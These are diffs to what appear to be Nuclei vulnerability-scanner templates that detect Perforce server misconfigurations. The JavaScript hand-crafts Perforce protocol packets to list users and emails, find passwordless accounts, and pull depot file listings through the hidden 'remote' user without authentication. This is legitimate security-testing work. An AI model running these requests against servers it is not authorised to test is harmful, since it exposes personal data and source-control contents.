+              conn.SendHex(payloadHex);
+              conn.SetTimeout(3);
+              
+              for(var loop=0; loop<10; loop++) {
+                  try {
+                      var bytes = conn.Recv(4096);
+                      if (bytes && bytes.length > 0) {
+                          for(var i=0; i < bytes.length; i++) {
+                               rawBuffer += String.fromCharCode(bytes[i]);
+                          }
+                          if (rawBuffer.indexOf('func\u0000\u0007\u0000\u0000\u0000release\u0000') !== -1) {
+                              break;
+                          }
+                      } else {
+                          break;
+                      }
+                  } catch(e) { break; }
+              }
+              try { conn.SendHex(releaseHex); } catch(e) {}
+              conn.Close();
+          } catch(e) { return []; }
+
+          var packets = parsePerforceResponse(rawBuffer);
+          var extractedUsers = [];
+
+          for(var i=0; i < packets.length; i++) {
+              var pkt = packets[i];
+              if (pkt['user'] && pkt['email'] && pkt['func'] === 'client-Message') {
+                  extractedUsers.push({
+                      "user": pkt['user'],
+                      "email": pkt['email'],
+                      "fullName": pkt['fullName'],
+                      "accessDate": pkt['accessDate']
+                  });
+              }
+          }
+          return extractedUsers;
+      }
+
+      // --- EXECUTION ---
+      // 1. Try ASCII
+      var users = enumUsers(Host, Port, false);
+
+      // 2. If empty, try Unicode
+      if (users.length === 0) {
+          users = enumUsers(Host, Port, true);
+      }
+
+      JSON.stringify(users);
+
+    args:
+      Host: "{{Host}}"
+      Port: "1666"
+
+    # We use extractors to parse the JSON returned by the script
+    extractors:
+      - type: json
+        name: users
+        json:
+          - '.[].user'
+          
+      - type: json
+        name: emails
+        json:
+          - '.[].email'
+
+      - type: json
+        name: full_names
+        json:
+          - '.[].fullName'

--- a/javascript/misconfiguration/perforce-passwordless-users.yaml
+++ b/javascript/misconfiguration/perforce-passwordless-users.yaml
@@ -13,7 +13,6 @@ info:
   remediation: |
     Set dm.user.noautocreate=2 to prevent unauthenticated account creation.
     Require all users to set passwords and enforce security=3 or higher.
-    Full hardening: p4 configure set security=4
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
     cvss-score: 9.1

--- a/javascript/misconfiguration/perforce-passwordless-users.yaml
+++ b/javascript/misconfiguration/perforce-passwordless-users.yaml
@@ -1,0 +1,247 @@
+id: perforce-passwordless-users
+
+info:
+  name: Perforce Users With No Password
+  author: Morgan Robertson
+  severity: critical
+  description: |
+    This template checks for Perforce user accounts that have no password set. Accounts without passwords allow unauthenticated access as that user. This template works on both ASCII and unicode servers by sending an ASCII compatible request and if that fails, a unicode compatible request. This template will not work on servers that enforce SSL. This template emulates the perforce binary protocol and uses the tagged output format (tag parameter) to detect the presence or absence of the Password field in user records.
+  reference:
+    - https://morganrobertson.net/p4wned/
+    - https://www.keysight.com/blogs/en/tech/nwvs/2022/06/08/a-sneak-peek-into-the-protocol-behind-perforce
+    - https://help.perforce.com/helix-core/release-notes/current/relnotes.txt
+  remediation: |
+    Set dm.user.noautocreate=2 to prevent unauthenticated account creation.
+    Require all users to set passwords and enforce security=3 or higher.
+    Full hardening: p4 configure set security=4
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
+    cvss-score: 9.1
+    cwe-id: CWE-306
+    cpe: |
+         cpe:2.3:a:perforce:perforce_server:*:*:*:*:*:*:*:*
+         cpe:2.3:a:perforce:helix_core:*:*:*:*:*:*:*
+  metadata:
+    max-requests: 3
+    vendor: perforce
+    product: P4 (FKA "Helix Core", FKA "Perforce")
+    fofa-query: port="1666" && protocol="unknown"
+  tags: perforce,helixcore,scm,unauth,default-login,passwordless
+
+flow: tcp(1) && javascript(1)
+
+tcp:
+  - host:
+      - "{{Host}}:1666" # default port
+    inputs:
+      - type: hex
+        data: "efef000000636d7066696c65000000000000616c7453796e63000000000000636c69656e7400020000003937006170690005000000393939393900656e61626c6553747265616d73000000000000656e61626c654772617068000000000000657870616e64416e646d6170730000000000006368756e6b696e67000000000000686f737400090000006c6f63616c686f737400706f727400120000003139322e3136382e302e3130313a3136363600736e646275660007000000313936393931390072637662756600050000003938333034006175746f54756e650001000000310066756e63000800000070726f746f636f6c00eded00000076657273696f6e001c000000323032342e322f4c494e555832365838365f36342f32363937383232006175746f4c6f67696e00000000000070726f670002000000703400636c69656e7400090000006c6f63616c686f73740063776400040000002f746d7000686f737400090000006c6f63616c686f7374006f730004000000554e4958006c6f63616c65000100000043007573657200040000007573657200756e69636f6465000000000000636861727365740001000000310075746638626f6d00010000003100636c69656e74436173650001000000300066756e630009000000757365722d696e666f00"
+    read-size: 4096
+    matchers:
+      - type: word
+        part: data
+        encoding: hex
+        words:
+          - "xfiles"
+          - "server"
+        condition: and
+        internal: true
+
+javascript:
+  - code: |
+      var net = require("nuclei/net");
+
+      // --- HEX HELPERS ---
+      function strToHex(str) {
+          var hex = "";
+          for (var i = 0; i < str.length; i++) {
+              var h = str.charCodeAt(i).toString(16);
+              if (h.length < 2) h = "0" + h;
+              hex += h;
+          }
+          return hex;
+      }
+
+      function numToHexLE(num) {
+          var b1 = (num & 0xFF), b2 = ((num >> 8) & 0xFF), b3 = ((num >> 16) & 0xFF), b4 = ((num >> 24) & 0xFF);
+          return [b1, b2, b3, b4].map(function(b) {
+              var s = b.toString(16);
+              return (s.length < 2 ? "0" + s : s);
+          }).join("");
+      }
+
+      function packParamHex(name, value) {
+          return strToHex(name) + "00" + numToHexLE(value.length) + strToHex(value) + "00";
+      }
+
+      function buildPacketHex(params) {
+          var payloadHex = "";
+          for (var i = 0; i < params.length; i++) {
+              payloadHex += packParamHex(params[i][0], params[i][1]);
+          }
+          var totalLen = payloadHex.length / 2;
+          var lenLow = totalLen & 0xFF;
+          var lenHigh = (totalLen >> 8) & 0xFF;
+          var xor = lenLow ^ lenHigh;
+          var headerHex = [xor, lenLow, lenHigh, 0, 0].map(function(b) {
+              var s = b.toString(16); return (s.length < 2 ? "0" + s : s);
+          }).join("");
+          return headerHex + payloadHex;
+      }
+
+      // --- PARSER ---
+      function parsePerforceResponse(dataStr) {
+          var offset = 0;
+          var results = [];
+          while (offset < dataStr.length) {
+              if (offset + 5 > dataStr.length) break;
+              var lenLow = dataStr.charCodeAt(offset + 1);
+              var lenHigh = dataStr.charCodeAt(offset + 2);
+              var bodyLen = lenLow | (lenHigh << 8);
+              var totalPacketSize = 5 + bodyLen;
+              if (offset + totalPacketSize > dataStr.length) break;
+
+              var body = dataStr.substring(offset + 5, offset + totalPacketSize);
+              var packetObj = {};
+              var bodyOffset = 0;
+
+              while (bodyOffset < body.length) {
+                  var nameEnd = body.indexOf('\u0000', bodyOffset);
+                  if (nameEnd === -1) break;
+                  var key = body.substring(bodyOffset, nameEnd);
+                  bodyOffset = nameEnd + 1;
+
+                  if (bodyOffset + 4 > body.length) break;
+                  var v0 = body.charCodeAt(bodyOffset);
+                  var v1 = body.charCodeAt(bodyOffset + 1);
+                  var v2 = body.charCodeAt(bodyOffset + 2);
+                  var v3 = body.charCodeAt(bodyOffset + 3);
+                  var valLen = (v0 | (v1 << 8) | (v2 << 16) | (v3 << 24)) >>> 0;
+                  bodyOffset += 4;
+
+                  if (bodyOffset + valLen > body.length) break;
+                  var value = body.substring(bodyOffset, bodyOffset + valLen);
+                  packetObj[key] = value;
+                  bodyOffset += valLen + 1;
+              }
+              results.push(packetObj);
+              offset += totalPacketSize;
+          }
+          return results;
+      }
+
+      // --- LOGIC: Find Passwordless Users ---
+      // Uses user-users with tag parameter, which switches the server to tagged
+      // (client-FstatInfo) output format. The Password field is "enabled" for
+      // users with passwords, and absent entirely for passwordless users.
+      function findPasswordlessUsers(host, port, useUnicode) {
+          var address = host + ":" + port;
+
+          // Packet 1: Protocol Handshake
+          var p1 = [
+              ["cmpfile", ""], ["altSync", ""], ["client", "76"], ["api", "99999"],
+              ["enableStreams", ""], ["enableGraph", ""], ["expandAndmaps", ""], ["chunking", ""],
+              ["host", "localhost"], ["port", address], ["sndbuf", "1969919"], ["rcvbuf", "98304"],
+              ["autoTune", "1"], ["func", "protocol"]
+          ];
+
+          // Packet 2: user-users with tag parameter for tagged output
+          var p2 = [
+              ["version", "2024.2/LINUX26X86_64/2697822"], ["autoLogin", ""], ["prog", "p4"],
+              ["client", "localhost"], ["cwd", "/tmp"], ["host", "localhost"],
+              ["os", "UNIX"], ["locale", "C"], ["user", "temp"]
+          ];
+
+          if (useUnicode) {
+              p2.push(["unicode", ""]);
+          }
+
+          p2.push(["charset", "1"]);
+          p2.push(["utf8bom", "1"]);
+          p2.push(["clientCase", "0"]);
+          p2.push(["tag", ""]);
+          p2.push(["func", "user-users"]);
+
+          var p3 = [["func", "release"]];
+
+          var payloadHex = buildPacketHex(p1) + buildPacketHex(p2);
+          var releaseHex = buildPacketHex(p3);
+          var rawBuffer = "";
+
+          try {
+              var conn = net.Open("tcp", address);
+              conn.SendHex(payloadHex);
+              conn.SetTimeout(5);
+
+              for (var loop = 0; loop < 10; loop++) {
+                  try {
+                      var bytes = conn.Recv(4096);
+                      if (bytes && bytes.length > 0) {
+                          for (var i = 0; i < bytes.length; i++) {
+                              rawBuffer += String.fromCharCode(bytes[i]);
+                          }
+                          if (rawBuffer.indexOf('func\u0000\u0007\u0000\u0000\u0000release\u0000') !== -1) {
+                              break;
+                          }
+                      } else {
+                          break;
+                      }
+                  } catch (e) { break; }
+              }
+              try { conn.SendHex(releaseHex); } catch(e) {}
+              conn.Close();
+          } catch (e) { return []; }
+
+          var packets = parsePerforceResponse(rawBuffer);
+          var passwordlessUsers = [];
+
+          for (var i = 0; i < packets.length; i++) {
+              var pkt = packets[i];
+              // Tagged output uses client-FstatInfo with capitalized field names.
+              // Passwordless users have no Password field in their packet.
+              if (pkt['func'] === 'client-FstatInfo' && pkt['User'] && pkt['Email'] && !pkt['Password']) {
+                  passwordlessUsers.push({
+                      "user": pkt['User'],
+                      "email": pkt['Email'],
+                      "fullName": pkt['FullName']
+                  });
+              }
+          }
+          return passwordlessUsers;
+      }
+
+      // --- EXECUTION ---
+      // 1. Try ASCII
+      var users = findPasswordlessUsers(Host, Port, false);
+
+      // 2. If empty, try Unicode
+      if (users.length === 0) {
+          users = findPasswordlessUsers(Host, Port, true);
+      }
+
+      JSON.stringify(users);
+
+    args:
+      Host: "{{Host}}"
+      Port: "1666"
+
+    matchers:
+      - type: word
+        words:
+          - '"user":'
+
+    extractors:
+      - type: json
+        name: passwordless_users
+        json:
+          - '.[].user'
+
+      - type: json
+        name: emails
+        json:
+          - '.[].email'
+
+      - type: json
+        name: full_names
+        json:
+          - '.[].fullName'

--- a/javascript/misconfiguration/perforce-passwordless-users.yaml
+++ b/javascript/misconfiguration/perforce-passwordless-users.yaml
@@ -30,6 +30,42 @@ info:
 
 flow: tcp(1) && javascript(1)
 
+### Hex Bytes Decoded
+# Packet 1: Protocol Handshake
+# ----------------------------
+# cmpfile       : ""
+# altSync       : ""
+# client        : "97"
+# api           : "99999"
+# enableStreams : ""
+# enableGraph   : ""
+# expandAndmaps : ""
+# chunking      : ""
+# host          : "localhost"
+# port          : "192.168.0.101:1666" # Ignored by server
+# sndbuf        : "1969919"
+# rcvbuf        : "98304"
+# autoTune      : "1"
+# func          : "protocol"
+
+# Packet 2: Command (user-info)
+# -----------------------------
+# version       : "2024.2/LINUX26X86_64/2697822"
+# autoLogin     : ""
+# prog          : "p4"
+# client        : "localhost"
+# cwd           : "/tmp"
+# host          : "localhost"
+# os            : "UNIX"
+# locale        : "C"
+# user          : "user"
+# unicode       : ""
+# charset       : "1"
+# utf8bom       : "1"
+# clientCase    : "0"
+# func          : "user-info"
+
+
 tcp:
   - host:
       - "{{Host}}:1666" # default port

--- a/javascript/misconfiguration/perforce-passwordless-users.yaml
+++ b/javascript/misconfiguration/perforce-passwordless-users.yaml
@@ -1,73 +1,34 @@
 id: perforce-passwordless-users
 
 info:
-  name: Perforce Users With No Password
+  name: Perforce Server - Passwordless User Accounts
   author: Morgan Robertson
   severity: critical
   description: |
-    This template checks for Perforce user accounts that have no password set. Accounts without passwords allow unauthenticated access as that user. This template works on both ASCII and unicode servers by sending an ASCII compatible request and if that fails, a unicode compatible request. This template will not work on servers that enforce SSL. This template emulates the perforce binary protocol and uses the tagged output format (tag parameter) to detect the presence or absence of the Password field in user records.
+    Perforce server contained user accounts with no password set, allowing unauthenticated access as those users. The user-users RPC was issued with the tag parameter to switch the server to tagged (client-FstatInfo) output, which omits the Password field entirely for passwordless accounts. Both ASCII and Unicode server modes were affected. SSL-enforcing servers are not affected.
   reference:
     - https://morganrobertson.net/p4wned/
     - https://www.keysight.com/blogs/en/tech/nwvs/2022/06/08/a-sneak-peek-into-the-protocol-behind-perforce
     - https://help.perforce.com/helix-core/release-notes/current/relnotes.txt
-  remediation: |
-    Set dm.user.noautocreate=2 to prevent unauthenticated account creation.
-    Require all users to set passwords and enforce security=3 or higher.
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
     cvss-score: 9.1
     cwe-id: CWE-306
-    cpe: |
-         cpe:2.3:a:perforce:perforce_server:*:*:*:*:*:*:*:*
-         cpe:2.3:a:perforce:helix_core:*:*:*:*:*:*:*
+    cpe: cpe:2.3:a:perforce:helix_core:*:*:*:*:*:*:*:*
   metadata:
-    max-requests: 3
+    verified: true
+    max-request: 3
     vendor: perforce
-    product: P4 (FKA "Helix Core", FKA "Perforce")
+    product: helix_core
+    shodan-query: port:1666 "P4D"
     fofa-query: port="1666" && protocol="unknown"
-  tags: perforce,helixcore,scm,unauth,default-login,passwordless
+  tags: perforce,helixcore,scm,unauth,passwordless,enum
 
 flow: tcp(1) && javascript(1)
 
-### Hex Bytes Decoded
-# Packet 1: Protocol Handshake
-# ----------------------------
-# cmpfile       : ""
-# altSync       : ""
-# client        : "97"
-# api           : "99999"
-# enableStreams : ""
-# enableGraph   : ""
-# expandAndmaps : ""
-# chunking      : ""
-# host          : "localhost"
-# port          : "192.168.0.101:1666" # Ignored by server
-# sndbuf        : "1969919"
-# rcvbuf        : "98304"
-# autoTune      : "1"
-# func          : "protocol"
-
-# Packet 2: Command (user-info)
-# -----------------------------
-# version       : "2024.2/LINUX26X86_64/2697822"
-# autoLogin     : ""
-# prog          : "p4"
-# client        : "localhost"
-# cwd           : "/tmp"
-# host          : "localhost"
-# os            : "UNIX"
-# locale        : "C"
-# user          : "user"
-# unicode       : ""
-# charset       : "1"
-# utf8bom       : "1"
-# clientCase    : "0"
-# func          : "user-info"
-
-
 tcp:
   - host:
-      - "{{Host}}:1666" # default port
+      - "{{Host}}:1666"
     inputs:
       - type: hex
         data: "efef000000636d7066696c65000000000000616c7453796e63000000000000636c69656e7400020000003937006170690005000000393939393900656e61626c6553747265616d73000000000000656e61626c654772617068000000000000657870616e64416e646d6170730000000000006368756e6b696e67000000000000686f737400090000006c6f63616c686f737400706f727400120000003139322e3136382e302e3130313a3136363600736e646275660007000000313936393931390072637662756600050000003938333034006175746f54756e650001000000310066756e63000800000070726f746f636f6c00eded00000076657273696f6e001c000000323032342e322f4c494e555832365838365f36342f32363937383232006175746f4c6f67696e00000000000070726f670002000000703400636c69656e7400090000006c6f63616c686f73740063776400040000002f746d7000686f737400090000006c6f63616c686f7374006f730004000000554e4958006c6f63616c65000100000043007573657200040000007573657200756e69636f6465000000000000636861727365740001000000310075746638626f6d00010000003100636c69656e74436173650001000000300066756e630009000000757365722d696e666f00"
@@ -86,7 +47,6 @@ javascript:
   - code: |
       var net = require("nuclei/net");
 
-      // --- HEX HELPERS ---
       function strToHex(str) {
           var hex = "";
           for (var i = 0; i < str.length; i++) {
@@ -124,7 +84,6 @@ javascript:
           return headerHex + payloadHex;
       }
 
-      // --- PARSER ---
       function parsePerforceResponse(dataStr) {
           var offset = 0;
           var results = [];
@@ -165,14 +124,9 @@ javascript:
           return results;
       }
 
-      // --- LOGIC: Find Passwordless Users ---
-      // Uses user-users with tag parameter, which switches the server to tagged
-      // (client-FstatInfo) output format. The Password field is "enabled" for
-      // users with passwords, and absent entirely for passwordless users.
       function findPasswordlessUsers(host, port, useUnicode) {
           var address = host + ":" + port;
 
-          // Packet 1: Protocol Handshake
           var p1 = [
               ["cmpfile", ""], ["altSync", ""], ["client", "76"], ["api", "99999"],
               ["enableStreams", ""], ["enableGraph", ""], ["expandAndmaps", ""], ["chunking", ""],
@@ -180,7 +134,6 @@ javascript:
               ["autoTune", "1"], ["func", "protocol"]
           ];
 
-          // Packet 2: user-users with tag parameter for tagged output
           var p2 = [
               ["version", "2024.2/LINUX26X86_64/2697822"], ["autoLogin", ""], ["prog", "p4"],
               ["client", "localhost"], ["cwd", "/tmp"], ["host", "localhost"],
@@ -232,8 +185,6 @@ javascript:
 
           for (var i = 0; i < packets.length; i++) {
               var pkt = packets[i];
-              // Tagged output uses client-FstatInfo with capitalized field names.
-              // Passwordless users have no Password field in their packet.
               if (pkt['func'] === 'client-FstatInfo' && pkt['User'] && pkt['Email'] && !pkt['Password']) {
                   passwordlessUsers.push({
                       "user": pkt['User'],
@@ -245,11 +196,8 @@ javascript:
           return passwordlessUsers;
       }
 
-      // --- EXECUTION ---
-      // 1. Try ASCII
       var users = findPasswordlessUsers(Host, Port, false);
 
-      // 2. If empty, try Unicode
       if (users.length === 0) {
           users = findPasswordlessUsers(Host, Port, true);
       }
@@ -264,6 +212,8 @@ javascript:
       - type: word
         words:
           - '"user":'
+          - '"email":'
+        condition: and
 
     extractors:
       - type: json

--- a/javascript/misconfiguration/perforce-remote-depot-unauth.yaml
+++ b/javascript/misconfiguration/perforce-remote-depot-unauth.yaml
@@ -1,0 +1,356 @@
+id: perforce-remote-depot-unauth
+
+info:
+  name: Perforce Unauthenticated Remote Depot Access
+  author: Morgan Robertson
+  severity: high
+  description: |
+    This template checks for remote depot access via the default, hidden "remote" user. This is available in server versions below 2025.1 and when the security level is below 4 (default security level is 0). This template will not work on servers that enforce SSL. This template works on both ASCII and unicode servers by sending an ASCII compatible request and if that fails, a unicode compatible request. This template emulates the perforce binary protocol and extracts filenames & change list number.
+  reference:
+    - https://morganrobertson.net/p4wned/
+    - https://www.keysight.com/blogs/en/tech/nwvs/2022/06/08/a-sneak-peek-into-the-protocol-behind-perforce
+    - https://help.perforce.com/helix-core/release-notes/current/relnotes.txt
+  remediation: |
+    Set security=4 to disable the built-in "remote" user.
+    This is fixed by default in Perforce 2025.1+.
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cwe-id: CWE-306
+    cpe: |
+         cpe:2.3:a:perforce:perforce_server:*:*:*:*:*:*:*:* versions up to (excluding) 2025.1
+         cpe:2.3:a:perforce:helix_core:*:*:*:*:*:*:* versions up to (excluding) 2025.1
+  metadata:
+    max-requests: 3
+    vendor: perforce
+    product: P4 (FKA "Helix Core", FKA "Perforce")
+    fofa-query: port="1666" && protocol="unknown"
+  tags: perforce,helixcore,scm,unauth,rpc,default-login
+
+flow: tcp(1) && javascript(1)
+
+### Hex Bytes Decoded
+# Packet 1: Protocol Handshake
+# ----------------------------
+# cmpfile       : ""
+# altSync       : ""
+# client        : "97"
+# api           : "99999"
+# enableStreams : ""
+# enableGraph   : ""
+# expandAndmaps : ""
+# chunking      : ""
+# host          : "localhost"
+# port          : "192.168.0.101:1666" # Ignored by server
+# sndbuf        : "1969919"
+# rcvbuf        : "98304"
+# autoTune      : "1"
+# func          : "protocol"
+
+# Packet 2: Command (user-info)
+# -----------------------------
+# version       : "2024.2/LINUX26X86_64/2697822"
+# autoLogin     : ""
+# prog          : "p4"
+# client        : "localhost"
+# cwd           : "/tmp"
+# host          : "localhost"
+# os            : "UNIX"
+# locale        : "C"
+# user          : "user"
+# unicode       : ""
+# charset       : "1"
+# utf8bom       : "1"
+# clientCase    : "0"
+# func          : "user-info"
+
+
+tcp:
+  - host:
+      - "{{Host}}:1666" # default port
+    inputs:
+      - type: hex
+        data: "efef000000636d7066696c65000000000000616c7453796e63000000000000636c69656e7400020000003937006170690005000000393939393900656e61626c6553747265616d73000000000000656e61626c654772617068000000000000657870616e64416e646d6170730000000000006368756e6b696e67000000000000686f737400090000006c6f63616c686f737400706f727400120000003139322e3136382e302e3130313a3136363600736e646275660007000000313936393931390072637662756600050000003938333034006175746f54756e650001000000310066756e63000800000070726f746f636f6c00eded00000076657273696f6e001c000000323032342e322f4c494e555832365838365f36342f32363937383232006175746f4c6f67696e00000000000070726f670002000000703400636c69656e7400090000006c6f63616c686f73740063776400040000002f746d7000686f737400090000006c6f63616c686f7374006f730004000000554e4958006c6f63616c65000100000043007573657200040000007573657200756e69636f6465000000000000636861727365740001000000310075746638626f6d00010000003100636c69656e74436173650001000000300066756e630009000000757365722d696e666f00"
+    read-size: 4096
+    matchers:
+      - type: word
+        part: data
+        encoding: hex
+        words:
+          - "xfiles"
+          - "server"
+        condition: and
+        internal: true
+
+javascript:
+  - code: |
+      var net = require("nuclei/net");
+
+      // --- HEX HELPERS ---
+      function strToHex(str) {
+          var hex = "";
+          for (var i = 0; i < str.length; i++) {
+              var h = str.charCodeAt(i).toString(16);
+              if (h.length < 2) h = "0" + h;
+              hex += h;
+          }
+          return hex;
+      }
+
+      function numToHexLE(num) {
+          var b1 = (num & 0xFF), b2 = ((num >> 8) & 0xFF), b3 = ((num >> 16) & 0xFF), b4 = ((num >> 24) & 0xFF);
+          return [b1, b2, b3, b4].map(function(b) {
+              var s = b.toString(16);
+              return (s.length < 2 ? "0" + s : s);
+          }).join("");
+      }
+
+      // Standard Pack Param (String Value)
+      function packParamHex(name, value) {
+          return strToHex(name) + "00" + numToHexLE(value.length) + strToHex(value) + "00";
+      }
+
+      // Binary Pack Param (Hex Value)
+      // Used for passing pre-constructed binary payloads like keyVal
+      function packParamHexFromHex(name, valueHex) {
+          var len = valueHex.length / 2;
+          return strToHex(name) + "00" + numToHexLE(len) + valueHex + "00";
+      }
+
+      function buildPacketHex(params) {
+          var payloadHex = "";
+          for (var i = 0; i < params.length; i++) {
+              var p = params[i];
+              // If 3rd arg is true, value is already HEX
+              if (p.length === 3 && p[2] === true) {
+                   payloadHex += packParamHexFromHex(p[0], p[1]);
+              } else {
+                   payloadHex += packParamHex(p[0], p[1]);
+              }
+          }
+          var totalLen = payloadHex.length / 2;
+          var lenLow = totalLen & 0xFF;
+          var lenHigh = (totalLen >> 8) & 0xFF;
+          var xor = lenLow ^ lenHigh;
+          var headerHex = [xor, lenLow, lenHigh, 0, 0].map(function(b) {
+              var s = b.toString(16); return (s.length < 2 ? "0" + s : s);
+          }).join("");
+
+          return headerHex + payloadHex;
+      }
+
+      // --- PARSERS ---
+
+      // Parses raw response into Key-Value pairs
+      function parsePerforceResponse(dataStr) {
+          var offset = 0;
+          var results = [];
+          while (offset < dataStr.length) {
+              if (offset + 5 > dataStr.length) break;
+              var lenLow = dataStr.charCodeAt(offset + 1);
+              var lenHigh = dataStr.charCodeAt(offset + 2);
+              var bodyLen = lenLow | (lenHigh << 8);
+              var totalPacketSize = 5 + bodyLen;
+              if (offset + totalPacketSize > dataStr.length) break;
+
+              var body = dataStr.substring(offset + 5, offset + totalPacketSize);
+              var packetObj = {};
+              var bodyOffset = 0;
+
+              while (bodyOffset < body.length) {
+                  var nameEnd = body.indexOf('\u0000', bodyOffset);
+                  if (nameEnd === -1) break;
+                  var key = body.substring(bodyOffset, nameEnd);
+                  bodyOffset = nameEnd + 1;
+
+                  if (bodyOffset + 4 > body.length) break;
+                  var v0 = body.charCodeAt(bodyOffset);
+                  var v1 = body.charCodeAt(bodyOffset + 1);
+                  var v2 = body.charCodeAt(bodyOffset + 2);
+                  var v3 = body.charCodeAt(bodyOffset + 3);
+                  var valLen = (v0 | (v1 << 8) | (v2 << 16) | (v3 << 24)) >>> 0;
+                  bodyOffset += 4;
+
+                  if (bodyOffset + valLen > body.length) break;
+                  var value = body.substring(bodyOffset, bodyOffset + valLen);
+                  packetObj[key] = value;
+                  bodyOffset += valLen + 1;
+              }
+              results.push(packetObj);
+              offset += totalPacketSize;
+          }
+          return results;
+      }
+
+      // Decodes the binary 'data' blob from db.rev table
+      function decodeDbRev(bufferStr) {
+          var offset = 0;
+          var records = [];
+
+          // Internal helper to read uint32
+          function readUInt32() {
+              if (offset + 4 > bufferStr.length) return -1;
+              var v = bufferStr.charCodeAt(offset) |
+                      (bufferStr.charCodeAt(offset+1) << 8) |
+                      (bufferStr.charCodeAt(offset+2) << 16) |
+                      (bufferStr.charCodeAt(offset+3) << 24);
+              offset += 4;
+              return v >>> 0;
+          }
+
+          // Internal helper to read string
+          function readString() {
+              var len = readUInt32();
+              if (len === -1 || offset + len > bufferStr.length) return null;
+              var s = bufferStr.substring(offset, offset + len);
+              offset += len;
+              return s;
+          }
+
+          while (offset < bufferStr.length) {
+              var depotFile = readString();
+              if (depotFile === null) break;
+
+              var rev = readUInt32();
+              var type = readUInt32();
+              var action = readUInt32();
+              var change = readUInt32();
+              var date = readUInt32();
+              var modTime = readUInt32();
+
+              // Digest (16 bytes) + Size (8 bytes) + Trait (4) + Unknown (4) = 32 bytes
+              if (offset + 32 > bufferStr.length) break;
+              offset += 32;
+
+              var lazyFile = readString();
+              var revStr = readString();
+              var typeStr = readString();
+
+              records.push({
+                  "depotFile": depotFile,
+                  "rev": rev,
+                  "change": change,
+                  "action": action,
+                  "date": new Date(date * 1000).toISOString().split('T')[0]
+              });
+          }
+          return records;
+      }
+
+      // --- LOGIC: Try Remote Access ---
+      function accessRemote(host, port, useUnicode) {
+          var address = host + ":" + port;
+
+          // 1. Construct keyVal Hex Buffer (42 bytes)
+          // 0-3: 02 00 00 00 (Int 2)
+          // 4-5: 2f 2f (//)
+          // 6-9: ff ff ff 7f (Int Max 2147483647)
+          // 10-41: Zeroes
+          var keyValHex = "02000000" + "2f2f" + "ffffff7f";
+          // Add 32 bytes of zeroes (64 hex chars)
+          for (var k = 0; k < 32; k++) keyValHex += "00";
+
+          // Packet 1: Protocol Handshake for server to server communication
+          var p1 = [
+              ["serverID", ""],
+              ["cmdIdent", "4139E823 20EDF233 3D743292 62DFA422"],
+              ["client", "97"],
+              ["sndbuf", "1969919"],
+              ["rcvbuf", "98304"],
+              ["autoTune", "1"],
+              ["func", "protocol"]
+          ];
+
+          // Packet 2: rmt-DbPipe Command
+          var p2 = [
+              ["keyVal", keyValHex, true], // true indicates value is already HEX
+              ["os", "UNIX"],
+              ["cwd", ""],
+              ["client", ""],
+              ["table", "db.rev"],
+              ["confirm", "dmr-DbPipe"],
+              ["version", "10"],
+              ["remoteRange", "1"],
+              ["remoteMap0", "//..."],
+              ["user", "remote"]
+          ];
+
+          if (useUnicode) {
+              p2.push(["unicode", ""]);
+          }
+
+          p2.push(["func", "rmt-DbPipe"]);
+
+          var p3 = [["func", "release"]];
+
+          var payloadHex = buildPacketHex(p1) + buildPacketHex(p2);
+          var releaseHex = buildPacketHex(p3);
+          var rawBuffer = "";
+
+          try {
+              var conn = net.Open("tcp", address);
+              conn.SendHex(payloadHex);
+              conn.SetTimeout(5);
+
+              // Read Loop
+              for (var loop = 0; loop < 20; loop++) {
+                  try {
+                      var bytes = conn.Recv(4096);
+                      if (bytes && bytes.length > 0) {
+                          for (var i = 0; i < bytes.length; i++) {
+                              rawBuffer += String.fromCharCode(bytes[i]);
+                          }
+                          if (rawBuffer.indexOf('func\u0000\u0007\u0000\u0000\u0000release\u0000') !== -1) {
+                              break;
+                          }
+                      } else {
+                          break;
+                      }
+                  } catch (e) { break; }
+              }
+              try { conn.SendHex(releaseHex); } catch(e) {}
+              conn.Close();
+          } catch (e) { return []; }
+
+          // Parse & Extract
+          var packets = parsePerforceResponse(rawBuffer);
+          var extractedFiles = [];
+
+          for (var i = 0; i < packets.length; i++) {
+              var pkt = packets[i];
+              // Check for DB Pipe response with data
+              if (pkt['func'] === 'dmr-DbPipe' && pkt['data']) {
+                  var records = decodeDbRev(pkt['data']);
+                  for (var r = 0; r < records.length; r++) {
+                      extractedFiles.push(records[r]);
+                  }
+              }
+          }
+          return extractedFiles;
+      }
+
+      // --- EXECUTION ---
+      // 1. Try ASCII
+      var files = accessRemote(Host, Port, false);
+
+      // 2. If empty, try Unicode
+      if (files.length === 0) {
+          files = accessRemote(Host, Port, true);
+      }
+
+      JSON.stringify(files);
+
+    args:
+      Host: "{{Host}}"
+      Port: "1666"
+
+    extractors:
+      - type: json
+        name: depot_files
+        json:
+          - '.[].depotFile'
+
+      - type: json
+        name: changes
+        json:
+          - '.[].change'

--- a/javascript/misconfiguration/perforce-remote-depot-unauth.yaml
+++ b/javascript/misconfiguration/perforce-remote-depot-unauth.yaml
@@ -1,73 +1,34 @@
 id: perforce-remote-depot-unauth
 
 info:
-  name: Perforce Unauthenticated Remote Depot Access
+  name: Perforce Server - Unauthenticated Remote Depot Access
   author: Morgan Robertson
   severity: high
   description: |
-    This template checks for remote depot access via the default, hidden "remote" user. This is available in server versions below 2025.1 and when the security level is below 4 (default security level is 0). This template will not work on servers that enforce SSL. This template works on both ASCII and unicode servers by sending an ASCII compatible request and if that fails, a unicode compatible request. This template emulates the perforce binary protocol and extracts filenames & change list number.
+    Detected Perforce server allowed unauthenticated remote depot access via the hidden built-in "remote" user. This affected server versions below 2025.1 when the security level was below 4 (default is 0). The depot file listing and change list numbers were retrieved without authentication using the rmt-DbPipe RPC against the db.rev table.
   reference:
     - https://morganrobertson.net/p4wned/
     - https://www.keysight.com/blogs/en/tech/nwvs/2022/06/08/a-sneak-peek-into-the-protocol-behind-perforce
     - https://help.perforce.com/helix-core/release-notes/current/relnotes.txt
-  remediation: |
-    Set security=4 to disable the built-in "remote" user.
-    This is fixed by default in Perforce 2025.1+.
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
